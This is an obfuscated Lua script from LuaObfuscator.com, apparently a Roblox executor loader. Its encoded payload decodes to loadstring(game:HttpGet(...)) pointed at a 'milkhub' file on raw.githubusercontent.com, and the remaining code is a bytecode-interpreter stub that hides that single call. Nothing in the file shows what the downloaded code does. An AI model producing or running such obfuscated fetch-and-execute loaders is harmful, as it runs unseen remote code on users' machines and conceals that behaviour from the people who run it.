--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.16) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v81=0;local v82;while true do if (v81==0) then v82=v2(v0(v30,16));if v19 then local v98=0;local v99;while true do if (v98==1) then return v99;end if (v98==0) then v99=v5(v82,v19);v19=nil;v98=1;end end else return v82;end break;end end end end);local function v20(v31,v32,v33)if v33 then local v83=0 -0 ;local v84;while true do if (v83==(0 + 0)) then v84=(v31/((5 -3)^(v32-1)))%((3 -1)^(((v33-(1638 -(1523 + 114))) -(v32-1)) + 1 + 0)) ;return v84-(v84%(2 -(4 -3))) ;end end else local v85=(621 -(555 + (181 -(32 + 85))))^(v32-(932 -(840 + 17 + 74))) ;return (((v31%(v85 + v85))>=v85) and (569 -(367 + 201))) or (927 -(214 + 713)) ;end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35,v36=v1(v16,v18,v18 + 2 );v18=v18 + 1 + 1 ;return (v36 * (1213 -(892 + 65))) + v35 ;end local function v23()local v37,v38,v39,v40=v1(v16,v18,v18 + 3 );v18=v18 + (9 -(185 -(67 + 113))) ;return (v40 * (31011612 -14234396)) + (v39 * (120312 -54776)) + (v38 * (606 -(87 + 263))) + v37 ;end local function v24()local v41=v23();local v42=v23();local v43=1 + 0 ;local v44=(v20(v42,2 -1 ,20 + 0 + 0 ) * ((2 + 0)^(127 -95))) + v41 ;local v45=v20(v42,21,31);local v46=((v20(v42,984 -(802 + (547 -397)) )==(2 -1)) and  -(1 -0)) or (1 + 0) ;if (v45==(997 -(915 + 82))) then if (v44==(0 -0)) then return v46 * (0 + 0) ;else v45=1 -0 ;v43=438 -((514 -369) + 293) ;end elseif (v45==(3234 -((1928 -(814 + 45)) + 118))) then return ((v44==(1486 -(998 + 488))) and (v46 * ((2 -1)/((0 -0) -0)))) or (v46 * NaN) ;end return v8(v46,v45-(1795 -(201 + 571)) ) * (v43 + (v44/((1 + 1)^((12 + 204) -164)))) ;end local function v25(v47)local v48;if  not v47 then local v86=0 + 0 ;while true do if (v86==((3046 -2161) -(261 + 624))) then v47=v23();if (v47==(0 -0)) then return "";end break;end end end v48=v3(v16,v18,(v18 + v47) -(1 -(1747 -(760 + 987))) );v18=v18 + v47 ;local v49={};for v65=1 + 0 , #v48 do v49[v65]=v2(v1(v3(v48,v65,v65)));end return v6(v49);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v50=0;local v51;local v52;local v53;local v54;local v55;local v56;local v57;local v58;while true do if (v50~=(0 -0)) then else v51=0 + 0 ;v52=nil;v50=1 + 0 ;end if (v50==3) then v57=nil;v58=nil;v50=3 + 1 ;end if (v50==(852 -(20 + 830))) then v55=nil;v56=nil;v50=1639 -(1373 + 263) ;end if (4==v50) then while true do if (v51~=0) then else local v95=1000 -(451 + 549) ;while true do if ((1 + 0)==v95) then v51=1 -0 ;break;end if (v95==0) then v52=0 -0 ;v53=nil;v95=1385 -(746 + 638) ;end end end if (v51==(2 + 1)) then v58=nil;while true do local v100=0;while true do if (v100~=(1 -0)) then else if (v52~=2) then else local v116=0 + 0 ;while true do local v119=0 + 0 ;while true do if (v119==(341 -(218 + 123))) then if (v116~=(0 -0)) then else for v146=2 -1 ,v23() do local v147=1581 -(1535 + 46) ;local v148;local v149;while true do if (v147==(405 -(118 + 287))) then v148=0;v149=nil;v147=3 -2 ;end if (v147==(1 + 0)) then while true do if (v148~=(0 + 0)) then else v149=v21();if (v20(v149,1,1)~=(377 -(142 + 235))) then else local v159=0;local v160;local v161;local v162;while true do if (v159==(9 -7)) then if (v20(v161,1,1)~=(1 + 0)) then else v162[562 -(306 + 254) ]=v58[v162[1 + 1 ]];end if (v20(v161,2,3 -1 )~=(1 + 0)) then else v162[3]=v58[v162[3]];end v159=3;end if (v159==0) then local v165=0;while true do if ((1468 -(899 + 568))==v165) then v159=1 + 0 ;break;end if (v165~=(0 -0)) then else v160=v20(v149,605 -(268 + 335) ,293 -(60 + 230) );v161=v20(v149,576 -(426 + 146) ,12 -6 );v165=2 -1 ;end end end if (v159==(1 + 2)) then if (v20(v161,1459 -(282 + 1174) ,814 -(569 + 242) )==1) then v162[4]=v58[v162[11 -7 ]];end v53[v146]=v162;break;end if (1~=v159) then else local v167=753 -(239 + 514) ;local v168;while true do if (v167==0) then v168=0 + 0 ;while true do if ((0 + 0)==v168) then local v175=1329 -(797 + 532) ;while true do if (v175==(1025 -(706 + 318))) then v168=1252 -(721 + 530) ;break;end if (v175==0) then v162={v22(),v22(),nil,nil};if (v160==(0 + 0)) then local v176=0 + 0 ;local v177;local v178;local v179;while true do if ((700 -(271 + 429))==v176) then v177=731 -(476 + 255) ;v178=nil;v176=1 + 0 ;end if (v176~=(1 + 0)) then else v179=nil;while true do if (v177~=(1500 -(1408 + 92))) then else local v182=1086 -(461 + 625) ;while true do if (v182==1) then v177=1289 -(993 + 295) ;break;end if ((238 -(64 + 174))~=v182) then else v178=0 + 0 ;v179=nil;v182=1 + 0 ;end end end if (v177==1) then while true do if (v178~=(1171 -(418 + 753))) then else v179=0 + 0 ;while true do if (v179==(336 -(144 + 192))) then v162[219 -(42 + 174) ]=v22();v162[1 + 3 ]=v22();break;end end break;end end break;end end break;end end elseif (v160==(1 + 0)) then v162[3]=v23();elseif (v160==(2 + 0)) then v162[1 + 2 ]=v23() -(2^(545 -(406 + 123))) ;elseif (v160==(1772 -(1749 + 20))) then local v183=0 -0 ;local v184;while true do if (v183==(0 + 0)) then v184=1322 -(1249 + 73) ;while true do if (v184~=0) then else v162[3 + 0 ]=v23() -((1 + 1)^16) ;v162[3 + 1 ]=v22();break;end end break;end end end v175=1;end end end if ((2 -1)==v168) then v159=1935 -(565 + 1368) ;break;end end break;end end end end end break;end end break;end end end for v150=1,v23() do v54[v150-(1146 -(466 + 679)) ]=v28();end v116=3 -2 ;end if (v116==1) then return v56;end break;end end end end break;end if (v100==(0 -0)) then if (v52==0) then v53={};v54={};v55={};v56={v53,v54,nil,v55};v52=1 + 0 ;end if (v52==1) then local v117=0 -0 ;local v118;while true do if (v117~=(0 -0)) then else v118=0 -0 ;while true do if ((115 -(4 + 110))==v118) then for v152=1,v57 do local v153=584 -(57 + 527) ;local v154;local v155;local v156;local v157;while true do if (v153~=2) then else while true do if (v154~=(1428 -(41 + 1386))) then else v157=nil;while true do if ((0 -0)~=v155) then else local v163=0;while true do if (v163==(103 -(17 + 86))) then v156=v21();v157=nil;v163=1;end if (v163~=(2 -1)) then else v155=1 + 0 ;break;end end end if (v155==(1 -0)) then if (v156==1) then v157=v21()~=(0 -0) ;elseif (v156==(168 -(122 + 44))) then v157=v24();elseif (v156==(1004 -(938 + 63))) then v157=v25();end v58[v152]=v157;break;end end break;end if (v154==(0 -0)) then local v158=0;while true do if (v158==(0 -0)) then v155=0;v156=nil;v158=1;end if (v158==(1 + 0)) then v154=1126 -(936 + 189) ;break;end end end end break;end if (v153==(1 + 0)) then v156=nil;v157=nil;v153=2;end if (v153==(0 + 0)) then v154=0 -0 ;v155=nil;v153=66 -(30 + 35) ;end end end v56[2 + 1 ]=v21();v118=2 + 0 ;end if (2==v118) then v52=1259 -(1043 + 214) ;break;end if (v118==(0 -0)) then v57=v23();v58={};v118=1213 -(323 + 889) ;end end break;end end end v100=1;end end end break;end if (v51==(2 -1)) then local v96=0 -0 ;while true do if (v96~=(581 -(361 + 219))) then else v51=2;break;end if (v96==(0 -0)) then v54=nil;v55=nil;v96=1;end end end if (v51~=(322 -(53 + 267))) then else local v97=0;while true do if (v97==(1092 -(975 + 117))) then v56=nil;v57=nil;v97=1;end if (v97==(1 + 0)) then v51=3;break;end end end end break;end if (v50~=(414 -(15 + 398))) then else v53=nil;v54=nil;v50=2;end end end local function v29(v59,v60,v61)local v62=v59[1];local v63=v59[2];local v64=v59[3];return function(...)local v67=v62;local v68=v63;local v69=v64;local v70=v27;local v71=1;local v72= -1;local v73={};local v74={...};local v75=v12("#",...) -1 ;local v76={};local v77={};for v87=0,v75 do if (v87>=v69) then v73[v87-v69 ]=v74[v87 + 1 ];else v77[v87]=v74[v87 + 1 ];end end local v78=(v75-v69) + 1 ;local v79;local v80;while true do local v88=0;while true do if (v88==0) then v79=v67[v71];v80=v79[1];v88=1;end if (1==v88) then if (v80<=3) then if (v80<=1) then if (v80>0) then local v101=0;local v102;local v103;local v104;local v105;while true do if (2==v101) then for v140=v102,v72 do v105=v105 + 1 ;v77[v140]=v103[v105];end break;end if (v101==0) then v102=v79[2];v103,v104=v70(v77[v102](v13(v77,v102 + 1 ,v79[3])));v101=1;end if (v101==1) then v72=(v104 + v102) -1 ;v105=0;v101=2;end end else v77[v79[2]]=v61[v79[3]];end elseif (v80==2) then local v108=v79[2];local v109=v77[v79[3]];v77[v108 + 1 ]=v109;v77[v108]=v109[v79[4]];else v77[v79[2]]();end elseif (v80<=5) then if (v80>4) then do return;end else v77[v79[2]]=v79[3];end elseif (v80<=6) then v77[v79[2]]=v79[3]~=0 ;elseif (v80>7) then local v120=0;local v121;while true do if (v120==0) then v121=v79[2];v77[v121]=v77[v121](v13(v77,v121 + 1 ,v72));break;end end else local v122;local v123,v124;local v125;local v126;v77[v79[2]]=v61[v79[3]];v71=v71 + 1 ;v79=v67[v71];v77[v79[2]]=v61[v79[3]];v71=v71 + 1 ;v79=v67[v71];v126=v79[2];v125=v77[v79[3]];v77[v126 + 1 ]=v125;v77[v126]=v125[v79[4]];v71=v71 + 1 ;v79=v67[v71];v77[v79[2]]=v79[3];v71=v71 + 1 ;v79=v67[v71];v77[v79[2]]=v79[3]~=0 ;v71=v71 + 1 ;v79=v67[v71];v126=v79[2];v123,v124=v70(v77[v126](v13(v77,v126 + 1 ,v79[3])));v72=(v124 + v126) -1 ;v122=0;for v137=v126,v72 do v122=v122 + 1 ;v77[v137]=v123[v122];end v71=v71 + 1 ;v79=v67[v71];v126=v79[2];v77[v126]=v77[v126](v13(v77,v126 + 1 ,v72));v71=v71 + 1 ;v79=v67[v71];v77[v79[2]]();v71=v71 + 1 ;v79=v67[v71];do return;end end v71=v71 + 1 ;break;end end end end;end return v29(v28(),{},v17)(...);end v15("LOL!043O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574033F3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F6769726F667430312F6D696C6B6875622F6D61696E2F6D696C6B68756200093O0012073O00013O00122O000100023O00202O00010001000300122O000300046O000400016O000100049O0000026O000100016O00017O00",v9(),...);
